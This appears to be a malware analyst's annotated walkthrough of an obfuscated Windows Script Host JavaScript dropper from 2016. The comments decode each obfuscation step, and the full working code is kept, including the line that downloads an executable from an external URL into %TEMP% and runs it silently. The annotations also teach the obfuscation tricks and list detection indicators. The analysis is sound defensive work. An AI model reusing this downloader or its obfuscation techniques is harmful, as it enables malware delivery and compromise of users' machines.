Created March 22, 2016 19:10
// The first line doesn't look good, but after looking through the entire script, we can see that it's just random snippets from the jQuery source code.
// Strings like this one are assigned but never read anywhere below; they exist only as smokescreen.
// I have removed all the subsequent smokescreens for brevity
iAIzcLGbNj = " while ( ( elem = elem[ dir ] ) && elem.nodeType !== 9 ) { if ( elem.nodeType === 1 ) { if ( truncate && jQuery( elem ).is( until ) ) { break; } matched.push( elem ); } } return matched; };";
// Sets an index that is reused below to compute array positions. Its value changes several times (0 -> 6 -> 7 -> 8 -> 4), so track it carefully.
fergusI = 0;
// Adds a helper to every string that returns its first character (substr(0, 1))
String.prototype.contradistinction = function () { return this.substr(0, 1); };
// Whenever you have ("collection", "of", "strings") inside parentheses like this, the comma operator evaluates every operand and yields only the last one,
// so the first group of ("characteristically","major","n") returns "n"; the other words are noise.
// After evaluating every group and concatenation, this line equates to:
/*
["nhhlHCNAl", "AiRNhcDnBHy", "ExpandEnvironmentStrings", "%TEMP%", ".exe", "Run", "ActincentiveivincentiveeXincentiveObincentivejeincentivect", "sFtalU", "FlAYMT", "WScincentiveriptincentive.S", "AmvHaUzPHrP", "hincentiveelincentivel", "UJcMlBfkOA", "GrRAFKajeTo", "MincentiveSXincentiveMLincentive2.incentiveXMincentiveLHincentiveTTP"]
*/
var uUXTro = [("characteristically","major","n")+"hh"+("notebook","orion","transitory","verizon","lH")+"CNAl", "A"+"iR"+"Nh"+("seventyfour","morose","respond","cD")+"nBHy", "E"+"xpan"+("verse","elevation","plowing","corinth","dEnviron")+"me"+"nt"+"Stri"+("worshipper","gibbet","ngs"), ("turin","trite","rules","decorative","")+"%"+("wetted","picture","TE")+"MP%", ""+("charged","flapping","flexibility",".")+"exe", ("arbiter","sediment","R")+"un", "A"+"ct"+"in"+"ce"+"nt"+"ivei"+("accent","cheap","vi")+("accessible","hydraulic","debut","passim","nc")+"enti"+"ve"+"eXincentiv"+("fiscal","micah","preamble","eObinc")+"en"+"ti"+"ve"+"je"+"ince"+"nt"+"ivect", "sFtalU", "FlAYMT", ("episodes","perceived","dispel","W")+"Sc"+"ince"+"ntiver"+"ip"+"tinc"+"entive." + ("elated","falstaff","S"), "AmvHaUzPHrP", ("michigan","fatalism","brokendown","puerto","h")+"in"+"ce"+("convulsive","narrow","reporter","nt")+"iv"+"ee"+("deaths","eaves","disapproval","li")+"nc"+("sedative","remission","en")+"ti"+("woods","launch","modems","knitting","vel"), "UJcMlBfkOA", "G"+("humanitarian","straighten","priscilla","rRAF")+"Ka"+("britannica","doggerel","abasement","je")+"To", "Min"+"ce"+"ntiv"+"eS"+("deposit","sardinia","clime","Xi")+"nc"+"en"+("considerations","bruges","respondent","unconcern","ti")+"ve"+("unforgettable","ridley","priest","ML")+"in"+"ce"+("quinine","contrasting","nt")+("programming","satisfaction","iv")+"e2" + "."+"in"+"ce"+("inferno","neighborhood","andale","notation","nt")+("forsooth","birds","toronto","iv")+"eXMi"+"ncenti"+("decomposition","speciality","introspection","ve")+"LH"+"in"+"ce"+"nt"+"iveT"+"TP"];
// Another jQuery-looking smokescreen string (a regular expression lookup assigned to rneedsContext); it is never used
rQSHDCBXb = " var rneedsContext = jQuery.expr.match.needsContext;";
// splice(7, 2): removes the two filler entries "sFtalU", "FlAYMT" (indices 7 and 8) from the uUXTro array
uUXTro.splice(7, fergusI + 2);
// Removes every occurrence of the filler string "incentive" from uUXTro[6] (the 7th item) and assigns the result to the variable `chubby`, resulting in:
// chubby = "ActiveXObject"
chubby = uUXTro[1+4+1].split("incentive").join("");
// Looks up this["ActiveXObject"]. At the top level of a script `this` is the global object, so this is the host's ActiveXObject constructor
// (window.ActiveXObject in a browser; under Windows Script Host, which the WScript.Shell usage below suggests, the global scope).
// lrAXrUK is the constructor used for every COM object created below.
var lrAXrUK = this[chubby];
// Gibberish, never used
AapDxox = "IdauNqhuT";
// Using the comma-operator trick and the first-character helper above, assigns the variable `societies` the character "p"
societies = (("discharging", "bigger", "HiLPFi", "naive", "pVrSBHnCPxP") + "kbmKKwklAVc").contradistinction();
// Does the same for assigning the variable `theoriess` to the character "s"
theoriess = (("jordan", "hemlock", "ziHwqRxJu", "irrigation", "sSBVEfa") + "xEqzqkRRVx").contradistinction();
// Sets the index to 6
fergusI = 6;
// Assigns uUXTro[7] (the 8th position) the concatenation uUXTro[7] + uUXTro[9]: "WScincentiveriptincentive.Shincentiveelincentivel"
uUXTro[fergusI + 1] = uUXTro[fergusI + 1] + uUXTro[fergusI + 3];
// Overwrites uUXTro[8] (the 9th position) with the filler "EuHNTOs"
uUXTro[fergusI + 2] = "EuHNTOs";
// Increases the index to 7
fergusI++;
// splice(8, 3): removes the three entries at indices 8, 9 and 10 ("EuHNTOs", the now-unneeded "hincentiveelincentivel" and "UJcMlBfkOA"), resulting in:
/*
["nhhlHCNAl", "AiRNhcDnBHy", "ExpandEnvironmentStrings", "%TEMP%", ".exe", "Run", "ActincentiveivincentiveeXincentiveObincentivejeincentivect", "WScincentiveriptincentive.Shincentiveelincentivel", "GrRAFKajeTo", "MincentiveSXincentiveMLincentive2.incentiveXMincentiveLHincentiveTTP"]
*/
uUXTro.splice(fergusI + 1, fergusI - 4);
// Removes the filler string "incentive" from uUXTro[7], resulting in:
// uUXTro[7] = "WScript.Shell"
uUXTro[fergusI] = uUXTro[fergusI].split("incentive").join("");
// Creates a WScript.Shell COM object: new ActiveXObject("WScript.Shell"). OoKse is later used to expand %TEMP% and to run the dropped file
var OoKse = new lrAXrUK("" + uUXTro[fergusI] + "");
// Increases the index to 8
fergusI++;
// Again removes the filler "incentive", this time from uUXTro[9], resulting in:
// uUXTro[9] = "MSXML2.XMLHTTP"
uUXTro[fergusI + 1] = uUXTro[fergusI + 1].split("incentive").join("");
// Creates the HTTP client used for the download: new ActiveXObject("MSXML2.XMLHTTP")
var zBqJutIT = new lrAXrUK(uUXTro[1 + fergusI]);
// Sets the index to 4
fergusI /= 2;
// Calls OoKse.ExpandEnvironmentStrings("%TEMP%") on the WScript.Shell object (uUXTro[2] is the method name, uUXTro[3] the argument),
// so BPmnOej holds the expanded path of the user's temp directory
var BPmnOej = OoKse[uUXTro[fergusI - 2]](uUXTro[fergusI - 1]);
// Sets the variable `revealede` to the character "E"
revealede = (("potion", "instruments", "eYyeHhl", "emanuel", "EbYlGrsShJg") + "qWuYEw").contradistinction();
// Declares a function called `undeveloped` that accepts 2 parameters: the download URL and the base name of the file to drop
// This function is only called once, so I will be replacing the variables with their passed in values
// undeveloped(poseidon, economic): downloads the file at URL `poseidon` with MSXML2.XMLHTTP, writes it to "<temp>/<economic>.exe" via
// ADODB.Stream, then launches it through WScript.Shell.Run. Every step is inside one try/catch whose handler is empty, so any failure is silent.
function undeveloped(poseidon, economic) {
try {
// Using our previously defined BPmnOej (the result of WScript.Shell.ExpandEnvironmentStrings("%TEMP%")) and uUXTro[4] (".exe"),
// assigns the `jersey` variable the full drop path: <expanded %TEMP%>/yROdkAds.exe
var jersey = BPmnOej + "/" + economic + uUXTro[fergusI];
// "o" + "p" + "E" + "n" -> MSXML2.XMLHTTP.opEn("GET", "http://theme45.ultracom.co.in/system/logs/98h7b66gb.exe", false)
// The third argument `false` makes the request synchronous, so the response is complete before the next line runs
zBqJutIT["o" + societies + revealede + "n"](("dumfounded","reload","ratios","corollary","G") + revealede + ("uniform","desirable","cucumber","months","T"), poseidon, false);
// "s" + "e" + "n" + "d" -> MSXML2.XMLHTTP.send()
zBqJutIT[theoriess + ("practice","graduates","e") + (("tunes", "deferred", "vQJtIpP", "essayist", "sequence", "nxldkIa") + "GyucrQNudzq").contradistinction() + (("christians", "inane", "CEdBvsmD", "aborigines", "disputes", "dMNcSDdMEzF") + "wKxDlSnr").contradistinction()]();
// Only proceeds if the download returned HTTP 200
if (zBqJutIT.status == 200) {
// "ApODB.Stream".replace("p", "D") -> assigns PbOLTH a new ActiveXObject("ADODB.Stream")
var PbOLTH = new lrAXrUK((""+("expence","risky","A")+"pO"+("honduras","fastest","garter","everywhere","DB.") + ""+"S"+("parking","betty","acceded","tr")+"eam").replace("p", "D"));
// ADODB.Stream.open()
PbOLTH.open();
// 22 * 0 + 6 - 5 = 1, so ADODB.Stream.type = 1 (binary stream; the arithmetic only hides the constant)
PbOLTH.type = 22 * (12 - 8 - 4) + 6 - (8 / 2 + 1);
// ADODB.Stream.write(MSXML2.XMLHTTP.ResponseBody): copies the downloaded bytes into the stream
PbOLTH[("wellworn","wesley","tenderfoot","crane","w")+"ri"+"te"](zBqJutIT[""+"R"+"es"+("considerations","overpower","bukkake","warcraft","pon") + theoriess + "e"+"Bo"+("canal","dunce","dy")]);
// ("poDition").replace("D", "s") -> ADODB.Stream.position = 0; rewinds the stream before saving
PbOLTH[(societies + "o"+"Di"+("unearthly","intoxicate","embedded","theater","ti")+"on").replace("D", theoriess)] = 0;
// ADODB.Stream.saveToFile("<expanded %TEMP%>/yROdkAds.exe", 2); the second argument 2 means overwrite an existing file
PbOLTH["sav"+"eT"+"oF"+("reform","mastercard","constraint","patrol","ile")](jersey, 2);
// ADODB.Stream.close();
PbOLTH.close();
// uUXTro[5] is "Run" and the string comparison is always false, so this is WScript.Shell.Run("<expanded %TEMP%>/yROdkAds.exe", 1, false):
// executes the dropped file in a normal window without waiting for it to finish
OoKse[uUXTro[fergusI + 1]](jersey, 1, "ISKhYal" === "EwSDqpJcU");
}
// Empty handler: download, write and run errors are all swallowed, so a blocked request or disabled ActiveX leaves no visible trace
} catch (HiQurqnDJ) { };
}
// Calls the `undeveloped` function with the following values: "http://theme45.ultracom.co.in/system/logs/98h7b66gb.exe", "yROdkAds"
// This is the whole payload chain: fetch the remote executable, drop it into %TEMP% as yROdkAds.exe and run it.
// From a detection standpoint the observable behaviour is a script host creating MSXML2.XMLHTTP / ADODB.Stream / WScript.Shell objects,
// writing an .exe into %TEMP% and then launching it; the URL and file name above are the indicators this sample carries.
undeveloped("http:"+("morose","integration","liberty","upload","//")+("benefits","boards","cyber","th")+"em"+"e4"+("thereof","adaptation","invitations","bloggers","5.")+("unremitting","reminder","ultrac")+("legislation","vacations","finishing","om")+("milky","parking","outsider","jeffrey",".c")+"o.in/s"+("hubbub","fetter","ys")+"te"+"m/lo"+("skating","inflammatory","wring","reports","gs/98h")+"7b"+("surrey","edification","trepidation","66")+"gb.exe","yROdkAds");